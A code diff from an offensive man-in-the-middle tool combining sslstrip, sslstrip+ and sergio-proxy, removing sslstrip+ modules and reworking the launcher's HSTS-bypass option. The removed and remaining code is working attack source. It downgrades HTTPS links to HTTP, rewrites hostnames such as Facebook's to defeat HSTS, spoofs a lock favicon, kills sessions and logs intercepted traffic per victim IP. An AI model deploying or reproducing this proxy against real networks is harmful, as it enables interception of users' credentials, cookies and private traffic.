def connectionMade(self):
logging.debug(self.getLogLevel(), "HTTP connection made.")
self.plugins.hook()
self.sendRequest()
self.sendHeaders()
if (self.command == 'POST'):
self.sendPostData()
def handleStatus(self, version, code, message):
logging.debug(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message))
self.client.setResponseCode(int(code), message)
def handleHeader(self, key, value):
logging.debug("Got server header: %s:%s" % (key, value))
if (key.lower() == 'location'):
value = self.replaceSecureLinks(value)
if (key.lower() == 'content-type'):
if (value.find('image') != -1):
self.isImageRequest = True
logging.debug("Response is image content, not scanning...")
if (key.lower() == 'content-encoding'):
if (value.find('gzip') != -1):
logging.debug("Response is compressed...")
self.isCompressed = True
elif (key.lower() == 'content-length'):
self.contentLength = value
elif (key.lower() == 'set-cookie'):
self.client.responseHeaders.addRawHeader(key, value)
else:
self.client.setHeader(key, value)
self.plugins.hook()
def handleEndHeaders(self):
if (self.isImageRequest and self.contentLength != None):
self.client.setHeader("Content-Length", self.contentLength)
if self.length == 0:
self.shutdown()
def handleResponsePart(self, data):
if (self.isImageRequest):
self.client.write(data)
else:
HTTPClient.handleResponsePart(self, data)
def handleResponseEnd(self):
if (self.isImageRequest):
self.shutdown()
else:
try:
HTTPClient.handleResponseEnd(self)
except:
pass
def handleResponse(self, data):
if (self.isCompressed):
logging.debug("Decompressing content...")
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
logging.debug("Read from server:\n" + data)
#logging.log(self.getLogLevel(), "Read from server:\n <large data>" )
data = self.replaceSecureLinks(data)
res = self.plugins.hook()
data = res['data']
if (self.contentLength != None):
self.client.setHeader('Content-Length', len(data))
try:
self.client.write(data) #Gets rid of some generic errors
except:
pass
try:
self.shutdown()
except:
logging.info("Client connection dropped before request finished.")
def replaceSecureLinks(self, data):
sustitucion = {}
patchDict = self.urlMonitor.patchDict
if len(patchDict)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, patchDict.keys())))
data = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), data)
iterator = re.finditer(ServerConnection.urlExpression, data)
for match in iterator:
url = match.group()
logging.debug("Found secure reference: " + url)
nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
logging.debug("LEO replacing %s => %s"%(url,nuevaurl))
sustitucion[url] = nuevaurl
#data.replace(url,nuevaurl)
#data = self.urlMonitor.DataReemplazo(data)
if len(sustitucion)>0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, sustitucion.keys())))
data = dregex.sub(lambda x: str(sustitucion[x.string[x.start() :x.end()]]), data)
#logging.debug("LEO DEBUG received data:\n"+data)
#data = re.sub(ServerConnection.urlExplicitPort, r'https://\1/', data)
#data = re.sub(ServerConnection.urlTypewww, 'http://w', data)
#if data.find("http://w.face")!=-1:
# logging.debug("LEO DEBUG Found error in modifications")
# raw_input("Press Enter to continue")
#return re.sub(ServerConnection.urlType, 'http://web.', data)
return data
def shutdown(self):
if not self.shutdownComplete:
self.shutdownComplete = True
try:
self.client.finish()
self.transport.loseConnection()
except:
pass

View file

@ -1,44 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
from twisted.internet.protocol import ClientFactory
class ServerConnectionFactory(ClientFactory):
def __init__(self, command, uri, postData, headers, client):
self.command = command
self.uri = uri
self.postData = postData
self.headers = headers
self.client = client
def buildProtocol(self, addr):
return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)
def clientConnectionFailed(self, connector, reason):
logging.debug("Server connection failed.")
destination = connector.getDestination()
if (destination.port != 443):
logging.debug("Retrying via SSL")
self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
else:
self.client.finish()

View file

@ -1,29 +0,0 @@
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
from twisted.web.http import HTTPChannel
from ClientRequest import ClientRequest
class StrippingProxy(HTTPChannel):
'''sslstrip is, at heart, a transparent proxy server that does some unusual things.
This is the basic proxy server class, where we get callbacks for GET and POST methods.
We then proxy these out using HTTP or HTTPS depending on what information we have about
the (connection, client_address) tuple in our cache.
'''
requestFactory = ClientRequest

View file

@ -1,140 +0,0 @@
# URLMonitor
import re
import logging
from configobj import ConfigObj
class URLMonitor:
'''
The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
server is expecting over SSL. It also keeps track of secure favicon urls.
'''
# Start the arms race, and end up here...
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
_instance = None
sustitucion = {} # LEO: diccionario host / sustitucion
real = {} # LEO: diccionario host / real
patchDict = {
'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net',
'https:\/\/www.facebook.com':'http:\/\/social.facebook.com',
'return"https:"':'return"http:"'
}
def __init__(self):
self.strippedURLs = set()
self.strippedURLPorts = {}
self.redirects = []
self.faviconReplacement = False
hsts_config = ConfigObj("./config/hsts_bypass.cfg")
for k,v in hsts_config.items():
self.sustitucion[k] = v
self.real[v] = k
def isSecureLink(self, client, url):
for expression in URLMonitor.javascriptTrickery:
if (re.match(expression, url)):
return True
return (client,url) in self.strippedURLs
def writeClientLog(self, client, headers, message):
if not os.path.exists("./logs"):
os.makedirs("./logs")
if (client.getClientIP() + '.log') not in os.listdir("./logs"):
try:
log_message = "#Log file for %s (%s)\n" % (client.getClientIP(), headers['user-agent'])
except KeyError:
log_message = "#Log file for %s\n" % client.getClientIP()
log_file = open("./logs/" + client.getClientIP() + ".log", 'a')
log_file.write(log_message + message + "\n")
log_file.close()
else:
log_file = open("./logs/" + client.getClientIP() + ".log", 'a')
log_file.write(message + "\n")
log_file.close()
def getSecurePort(self, client, url):
if (client,url) in self.strippedURLs:
return self.strippedURLPorts[(client,url)]
else:
return 443
def addRedirection(self, from_url, to_url):
for s in self.redirects:
if from_url in s:
s.add(to_url)
return
self.redirects.append(set([from_url,to_url]))
def getRedirectionSet(self, url):
for s in self.redirects:
if url in s:
return s
return set([url])
def addSecureLink(self, client, url):
methodIndex = url.find("//") + 2
method = url[0:methodIndex]
pathIndex = url.find("/", methodIndex)
host = url[methodIndex:pathIndex].lower()
path = url[pathIndex:]
port = 443
portIndex = host.find(":")
if (portIndex != -1):
host = host[0:portIndex]
port = host[portIndex+1:]
if len(port) == 0:
port = 443
#LEO: Sustituir HOST
if not self.sustitucion.has_key(host):
lhost = host[:4]
if lhost=="www.":
self.sustitucion[host] = "w"+host
self.real["w"+host] = host
else:
self.sustitucion[host] = "web"+host
self.real["web"+host] = host
logging.info("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
url = 'http://' + host + path
#logging.debug("LEO stripped URL: %s %s"%(client, url))
self.strippedURLs.add((client, url))
self.strippedURLPorts[(client, url)] = int(port)
return 'http://'+self.sustitucion[host]+path
def setFaviconSpoofing(self, faviconSpoofing):
self.faviconSpoofing = faviconSpoofing
def isFaviconSpoofing(self):
return self.faviconSpoofing
def isSecureFavicon(self, client, url):
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
def URLgetRealHost(self,host):
logging.debug("Parsing host: %s"%host)
if self.real.has_key(host):
logging.debug("New host: %s"%self.real[host])
return self.real[host]
else:
logging.debug("New host: %s"%host)
return host
def getInstance():
if URLMonitor._instance == None:
URLMonitor._instance = URLMonitor()
return URLMonitor._instance
getInstance = staticmethod(getInstance)

View file

@ -33,7 +33,7 @@ if __name__ == "__main__":
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
sgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Disable the SSLstrip Proxy')
sgroup.add_argument("-b", "--bypass-hsts", dest='hsts', action="store_true", help="Enable HSTS bypass")
sgroup.add_argument("-b", "--bypass-hsts", dest='hsts', action="store_true", default=False, help="Enable HSTS bypass")
#Initialize plugins
plugins = []
@ -89,29 +89,11 @@ if __name__ == "__main__":
if args.disproxy:
ProxyPlugins.getInstance().setPlugins(load)
elif args.hsts:
from libs.sslstripplus.StrippingProxy import StrippingProxy
from libs.sslstripplus.URLMonitor import URLMonitor
URLMonitor.getInstance().setFaviconSpoofing(args.favicon)
CookieCleaner.getInstance().setEnabled(args.killsessions)
ProxyPlugins.getInstance().setPlugins(load)
strippingFactory = http.HTTPFactory(timeout=10)
strippingFactory.protocol = StrippingProxy
reactor.listenTCP(args.listen, strippingFactory)
print "\n[*] sslstrip v%s by Moxie Marlinspike running..." % sslstrip_version
print "[*] sslstrip+ by Leonardo Nve running..."
print "[*] sergio-proxy v%s online..." % sergio_version
else:
from libs.sslstrip.StrippingProxy import StrippingProxy
from libs.sslstrip.URLMonitor import URLMonitor
args.clients = False # temporary
URLMonitor.getInstance().setValues(args.favicon, args.clients)
URLMonitor.getInstance().setValues(args.favicon, args.hsts)
CookieCleaner.getInstance().setEnabled(args.killsessions)
ProxyPlugins.getInstance().setPlugins(load)
@ -121,6 +103,8 @@ if __name__ == "__main__":
reactor.listenTCP(args.listen, strippingFactory)
print "\n[*] sslstrip v%s by Moxie Marlinspike running..." % sslstrip_version
if args.hsts:
print "[*] sslstrip+ by Leonardo Nve running..."
print "[*] sergio-proxy v%s online" % sergio_version
reactor.run()